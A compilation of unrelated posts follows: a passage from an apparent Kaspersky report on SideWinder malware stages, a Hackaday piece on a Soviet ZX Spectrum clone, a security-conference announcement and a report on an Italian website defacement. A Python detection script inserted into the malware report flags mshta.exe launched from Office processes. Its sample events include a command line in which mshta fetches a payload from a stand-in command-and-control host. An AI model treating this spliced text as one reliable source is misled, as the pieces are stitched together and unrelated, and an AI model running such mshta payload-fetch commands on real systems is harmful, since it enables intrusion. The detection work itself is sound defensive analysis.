The second stage is another JavaScript file. It enumerates the subfolders at %Windows%\Microsoft.NET\Framework\ to find the version of the .NET framework installed on the system and uses the resulting value to configure the environment variable COMPLUS_Version. Finally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a base64-encoded .NET serialized stream.
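The two stages above leave a process-level trace a defender can key on: an exploited Office-side process launching mshta.exe with a remote location, and a script host carrying COMPLUS_Version in its environment. The following is an added detection example (not SideWinder's code, nor a Kaspersky rule) run over constructed Sysmon-like process events; the event fields, parent set and sample values are assumptions.

```python
"""Flag the mshta.exe / COMPLUS_Version chain over process-creation events."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# A remote location handed to mshta.exe: an http(s) URL, or a bare host/path
# as in the first snippet on the page.
URL_RE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}/\S*", re.IGNORECASE)

# Parents from which mshta.exe fetching a remote HTA is not expected.
# eqnedt32.exe (Equation Editor) is the process CVE-2017-11882 executes in;
# that is general knowledge, the page itself only names the CVE.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    env: Dict[str, str] = field(default_factory=dict)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: List[ProcEvent]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, detail) tuples for events matching the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if name == "mshta.exe":
            m = URL_RE.search(e.cmdline)
            if m and pname in OFFICE_PARENTS:
                findings.append(("office_spawns_mshta_remote", e.pid, m.group(0)))
        # The second-stage script sets COMPLUS_Version to pick a CLR before it
        # deserializes the .NET Downloader Module in-process; a script host
        # normally has no reason to carry that variable.
        if name in SCRIPT_HOSTS and "COMPLUS_Version" in e.env:
            findings.append(("script_host_complus_version", e.pid, e.env["COMPLUS_Version"]))
    return findings


# Constructed sample events (not from any real incident).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              'WINWORD.EXE /n "C:\\Users\\alice\\Downloads\\invite.docx"'),
    # Equation Editor is started through COM, so its parent is not Word (pid 200).
    ProcEvent(300, 40, r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              "EQNEDT32.EXE -Embedding"),
    ProcEvent(400, 300, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://c2.example.invalid/19263687/trui",
              env={"COMPLUS_Version": "v4.0.30319"}),
    # Benign: a local HTA run from Explorer.
    ProcEvent(500, 100, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\tools\helper.hta"'),
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid={pid} {detail}")
```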

Downloader Module


This component is a .NET library used to collect information about the installed security solution and download another component, the “Module Installer”. These components were already described in the previous article and will not be detailed again here.

In our latest investigation, we discovered a new version of the app.dll Downloader Module, which includes a more sophisticated function for identifying installed security solutions. In the previous version, the malware used a simple WMI query to obtain a list of installed products. The new version uses a different WMI query, which collects the name of the antivirus product and the related “productState” value.

Furthermore, the malware compares all running process names against an embedded dictionary. The dictionary contains 137 unique process names associated with popular security solutions.
The WMI query is executed only when no Kaspersky processes are running on the system.

Backdoor Loader


The infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library consistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot” implant into memory. Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior article, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has remained unchanged.

In the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For correct execution, it had to be stored on victims’ systems under one of the following names:

  • propsys.dll
  • vsstrace.dll

During the most recent campaign, the attackers tried to diversify the samples, generating many other variants distributed under the following names:

  • JetCfg.dll
  • policymanager.dll
  • winmm.dll
  • xmllite.dll
  • dcntel.dll
  • UxTheme.dll

The new malware variants feature an enhanced version of anti-analysis code and employ Control Flow Flattening more extensively to evade detection.

During the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic is the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks anti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were configured to load the second stage from a specific file path embedded in the code, which also included the user’s name. Example:
C:\Users\[REDACTED]\AppData\Roaming\valgrind\[REDACTED FILE NAME].[REDACTED EXTENSION]
It indicates that these variants were likely used after the infection phase and manually deployed by the attacker within the already compromised infrastructure, after validating the victim.

Victims


SideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. The targeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of attacks against the maritime and the logistics sectors has increased and expanded to Southeast Asia.

Furthermore, we observed attacks against entities associated with nuclear energy. The following industries were also affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels.

Countries and territories targeted by SideWinder in 2024

Overall, the group has further extended its activities, especially in Africa. We detected attacks in Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, the United Arab Emirates, and Vietnam.

In this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda.

Conclusion


SideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic infection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again emphasizes the critical importance of installing security patches.

Despite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know the group’s software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore, we know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot” described in our previous article. These capabilities make them a highly advanced and dangerous adversary.

To protect against such attacks, we strongly recommend maintaining a patch management process to apply security fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed) and using a comprehensive security solution that provides incident detection and response, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any complexity at an early stage. The campaign described in this article relies on spear-phishing emails as the initial attack vector, which highlights the importance of regular employee training and awareness programs for corporate security.

We will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective detection of malware.

More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

Indicators of compromise


securelist.com/sidewinder-apt-…


ZX Spectrum, Soviet Style: A 44-IC Clone You Can Build


Soviet ZX Spectrum clone on a table

If you’ve ever fancied building a ZX Spectrum clone without hunting down ancient ULAs or soldering your way through 60+ chips, [Alex J. Lowry] has just dropped an exciting build. He has recreated the Leningrad-1, a Soviet-built Spectrum clone from 1988, with a refreshingly low component count: 44 off-the-shelf ICs, as he wrote us. That’s fewer than many modern clones like the Superfo Harlequin, yet without resorting to programmable logic. All schematics, Gerbers, and KiCad files are open-source, listed at the bottom of [Alex]’ build log.

The original Leningrad-1 was designed by Sergey Zonov during the late Soviet era, when cloning Western tech was less about piracy and more about survival. Zonov’s design nailed a sweet spot between affordability and usability, with enough compatibility to run 90-95% of Spectrum software. [Alex]’ replica preserves that spirit, with a few 21st-century tweaks for builders: silkscreened component values, clever PCB stacking with nylon standoffs, and a DIY-friendly mechanical keyboard hack using transparent keycaps.

While Revision 0 still has some quirks – no SCART color output yet, occasional flickering borders with AY sound – [Alex] is planning for further improvements. Inspired to build your own? Read [Alex]’ full project log here.


hackaday.com/2025/03/10/zx-spe…


Two months to the RHC Conference 2025! Thanks to our Sponsors for making this event possible!


Only two months remain until the fourth edition of the Red Hot Cyber Conference 2025, the free annual event organized by the Red Hot Cyber community. The conference will be held in Rome, as last year at the Teatro Italia in Via Bari 18, on Thursday 8 and Friday 9 May 2025.

This event has become a reference point in the Italian landscape of information security, artificial intelligence and technological innovation, with the aim of raising public awareness of digital risks and promoting a cybersecurity culture, especially among young people.

The Red Hot Cyber community, founded in 2019 by Massimiliano Brolli, is dedicated to spreading information, news and research on topics related to information security, intelligence and Information Technology. Convinced that knowledge sharing and collaboration are fundamental to facing the challenges of cyberspace, RHC is actively committed to promoting a security culture, encouraging critical thinking and stimulating interest in computing disciplines among the young.


Reception at the Red Hot Cyber Conference 2024

A First Day Dedicated Exclusively to Young People


As every year, the first day of the conference will be entirely dedicated to young people, in particular to middle and high school students, to introduce them to the world of information technology and information security. Unlike previous years, the Workshops will be accessible only on Thursday 8 May.

The hands-on workshops, once again organized with the support of Accenture, will be the beating heart of the day: first we explain to the students how something is done, then we give them the chance to do it themselves on their own laptops. This practical and interactive approach is designed to stimulate interest in the world of technology and cybersecurity and to provide a unique opportunity to get hands-on with the technology.
Boston Dynamics’ SPOT robot dog at the “hands-on” Workshops of the Red Hot Cyber Conference 2024
We invite middle school, high school and university students to register for the conference, so that they can have a concrete and immersive learning experience.

But the first day will not be just training: this year too, the Capture The Flag (CTF) will be held, a competition for ethical hackers from all over Italy. Participants will compete in a series of practical cybersecurity, ethical hacking and problem-solving challenges, collecting points to climb the leaderboard and win the challenge.

A CTF is a cybersecurity competition in which participants must solve information security challenges to find and “capture” flags, that is, codes hidden within various digital scenarios. The RHC CTF will take place in a safe and controlled environment, offering young hackers the opportunity to test their skills, learn new techniques and compete with other enthusiasts in the field.


Capture The Flag (CTF) at the Red Hot Cyber Conference 2024

A Second Day Devoted to the Conference


While the first day will focus on young people and practical training, the second day of the Red Hot Cyber Conference 2025 will be devoted exclusively to the conference, with a series of high-level talks entirely in Italian.

Experts in information security, information technology and digital innovation will take turns on stage with exceptional talks, addressing topics such as hacking, artificial intelligence applied to cybersecurity, cloud and critical infrastructure security, cyber warfare, geopolitics and digital defense strategies, as well as the evolution of cybercrime.
Panel at the Red Hot Cyber Conference 2024. From left to right: Dr. Mario Nobile, Director General of AGID, the Agency for Digital Italy; Dr. Umberto Rosini, Director of Information Systems at the Presidency of the Council of Ministers – Civil Protection Department; Dr. Paolo Galdieri, criminal lawyer admitted to the Court of Cassation and university lecturer in computer criminal law; Eng. David Cenciotti, aerospace journalist, former Air Force officer, computer engineer and cybersecurity expert
The day will open with a high-level institutional panel, in which legal experts, representatives of institutions and industry professionals will discuss strategies and regulations for the digital protection of the country. The panel topic will be “THE FUTURE OF CYBERSECURITY IN ITALY – STRATEGIES FOR THE NEXT DIGITAL ERA”, a crucial debate on how Italy is preparing to face new cyber threats, with a focus on regulation, prevention and national strategies to strengthen digital security.

The Red Hot Cyber Conference 2025 will be a unique opportunity to engage with the leading experts in the field, explore the most current information security topics and understand how our country can face the digital challenges of the future.


A shot of the Capture The Flag participants

All This Thanks to Our Sponsors


This event would not be possible without the valuable support of our sponsors. Their collaboration is fundamental to offering an educational and engaging experience to all participants.

We also thank all our media partners: Fintech Awards, Cyber Actors, Women 4 Cyber, Digital Security Summit, GDPR Day, E-Campus Università, Hackmageddon, CyberSecurityUP, Federazione Italiana Combattenti, Ri-Creazione, Aipsi and RedHotCyber Academy.

We invite all companies interested in supporting the Red Hot Cyber Conference 2025 to contact us for information on the sponsorship packages still available. Your participation will help promote a culture of information security and train the professionals of the future.

Don’t miss the opportunity to be part of this important event in the world of cybersecurity!
[Photo gallery from the Red Hot Cyber Conference 2024: students filming and following the “hands-on” workshops; Francesco Conti, Luca Vinciguerra and Salvatore Ricciardi of the Red Hot Cyber AI group presenting the workshop “HOW TO BUILD A FACE RECOGNITION SYSTEM WITH AI”; Andrea Tassotti of CyberSecurityUP presenting the workshop “HOW TO HACK AN EXECUTABLE WHILE EVADING APPLICATION CONTROLS”; students playing the Capture The Flag; the audience; the entrance of Boston Dynamics’ SPOT; lunch; CTF participants on the theatre’s second staircase; a photo of the full STAFF]

The article Two months to the RHC Conference 2025! Thanks to our Sponsors for making this event possible! originally appeared on il blog della sicurezza informatica.


Italian Sites Targeted! The !FAKESITE Defacement and the Dark Side of Hacktivism


In recent days, several Italian websites have been targeted by a defacement attack, a technique used to modify the content of a web page without the owner’s consent. The affected sites include:

  • hxxps://viralproduction[.]it/1337.php
  • hxxps://diegolucattini[.]it/1337.php

These attacks were claimed by the group calling itself !FAKESITE, which left its signature on the defaced pages, accompanied by a provocative message and a list of pseudonyms of alleged members of the collective. Below is what the hacktivists posted on the sites:
SIGNED BY FAKESITE | CYBER ERROR SYSTEM

"If you ask me about a system’s vulnerabilities, I don’t have an answer. But what is certain is that the most vulnerable security is that of human beings themselves"

CONTACT ME CLICK HERE

Fakesite - Doys_404 - Anon_lx02 - Fakesec - Iethesia - SukaKamu01 - HanjsXploite - Enter666x - NoFace999 - Lanzz/GregCyber - XybaXploite - RommyXploit - Dandier - Xstroven - BigBoy - Amirxploite - Machfood - Fedup_404 - UniCorn - Izunasec

[ Cyber Error System | Jawa Barat Cyber | TegalXploiter ]
[ Bogor6etar | Hacktivist Of Garuda ]

What is a Deface?


Defacing is a form of hacking that consists of altering the content of a website, replacing the homepage or adding unauthorized elements. This type of attack can be carried out by exploiting vulnerabilities in web servers or CMSs (Content Management Systems), or through compromised credentials.

Defacements are often used for different purposes:

  • Demonstration of vulnerability: to highlight security flaws in a system.
  • Political or social messages: in cases of hacktivism, the attackers convey protest messages.
  • Propaganda: some groups use defacing to spread ideologies or to publicize certain causes.
  • Simple vandalism: in some cases, the attacks take place without a precise purpose, just for the pleasure of causing damage.


Hacktivism: When Hacking Becomes Protest


Hacktivism is a form of activism that uses computing techniques to promote a political or social cause. Hacktivist groups often attack government, institutional or corporate websites to raise public awareness of certain issues. Some of the best-known groups in this field are Anonymous, Lizard Squad and LulzSec.

In the case of the !FAKESITE group, the message left on the attacked sites suggests an intent closer to cyber-vandalism or a show of skills than to a genuine political cause. However, the references to a “Cyber Error System” and to collectives such as “Hacktivist Of Garuda” could suggest a link with broader movements in the underground hacking scene.

Implications and Security


Attacks of this type highlight the importance of adopting adequate security measures to protect websites from unauthorized intrusions. Some fundamental precautions include:

  • Regularly updating software and plugins.
  • Using strong passwords and two-factor authentication.
  • Monitoring access logs to spot suspicious activity.
  • Deploying firewalls and intrusion detection systems.

Defacing, although it may seem harmless compared with other, more devastating cyberattacks such as ransomware, can still cause significant reputational and financial damage to victims.

It remains to be seen whether the !FAKESITE group will continue with this type of attack or whether its activity will be limited to these isolated episodes. In the meantime, it is essential that website operators strengthen their defenses to avoid falling victim to similar incursions.

This article was written using the Recorded Future platform, a strategic partner of Red Hot Cyber and a leader in cyber threat intelligence, which provides advanced analysis to identify and counter malicious activity in cyberspace.

The article Italian Sites Targeted! The !FAKESITE Defacement and the Dark Side of Hacktivism originally appeared on il blog della sicurezza informatica.